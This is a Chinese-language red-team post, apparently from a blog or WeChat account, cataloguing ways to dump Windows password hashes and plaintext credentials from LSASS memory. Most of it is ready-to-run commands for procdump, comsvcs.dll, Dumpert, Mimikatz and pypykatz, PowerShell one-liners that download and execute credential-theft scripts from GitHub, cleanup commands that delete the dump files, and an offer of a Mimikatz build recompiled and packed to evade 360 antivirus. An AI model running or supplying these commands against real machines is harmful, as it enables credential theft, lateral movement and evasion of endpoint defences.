红队中各种抓取密码凭据的方法,文末彩蛋,内附工具链接,以及我制作的过360的minikatz的版本,各位请享用,最近筹备重新开blog,记录学习计划,不然知识我学完立马就忘了,与大家一起学习!
1.Procdump转储Lsass.exe的内存
前提:需要管理员及以上权限
常用命令:
procdump -accepteula -ma lsass.exe lsass_dump导出的.dmp文件本地配合minikatz 取出密码
sekurlsa::Minidump lsassdump.dmp
sekurlsa::logonPasswords如果对lsass.exe敏感的话,那么还可以配合lsass.exe的pid来使用更香:
procdump -accepteula -ma pid lsass.dmp2.wce导出hash
前提:需要管理员及以上权限,版本限制(仅支持Windows XP,2003,Vista,7、2008和Windows 8)
命令:
wce.exe -o file.txt
wec.exe3.comsvcs.dll转储LSASS.exe内存
前提:在powershell中运行,管理员权限以上
命令:
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass.dmp full清理:
Remove-Item $env:TEMP\lsass.dmp -ErrorAction Ignore4.使用系统调用和拜托hook的api转储LSASS.exe内存
详情请查看这篇文章:
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
这是一篇非常nice的文章,值得一看,打开一个新世界的大门!
有关github项目:
https://github.com/outflanknl/Dumpert命令:
dumpert_exe
或者
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump运行效果截图:
5.Windows Task Manager转储LSASS.exe内存
直接打开任务管理器,找到lsass.exe进程,右键选中右键
6.Mimikatz
前提:管理员权限以及以上,建议自己编译源码去掉一些特征字符,一些不必要的语句
命令:
mimikatz_exe "sekurlsa::minidump lsass.dump" "sekurlsa::logonpasswords full" exitpowershell:
#读取明文密码
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts
#读取hash
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes猕猴桃杀软重点看照对象之一。
7.pypykatz读取LSASS
前提:必须安装python3,管理员权限以及以上
命令:
#安装
pip install pypykatz
#使用
pypykatz live lsa抓得不只是lsass,还有其他的。
运行效果:
杀软拦截概率很低
8.Out-Minidump.ps1转储LSASS.exe内存
前提:powershell,管理员权限以及以上
命令:
powershell “IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump”清除文件:
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
杀软会拦截。
彩蛋福利
直接去下载github上面的release版本百分之百被杀的,我这把源码拉下来,自己编译,去除一些特征。
请看:过360的minikatz截图:
不知道是不是我刚更新没有关网络,把我64位的搞死了,但是32位的依然坚挺!然后接着保险起见,加壳
工具包里面有我编译好的一些工具,懂得都懂嗷,不会的百度。
公众号关注回复,minikatz,即可获得百度云下载链接,重申一遍,本公众号分享的工具,技术只供学习研究,切勿拿去违法犯罪,违法犯罪与公众号与作者无关。
END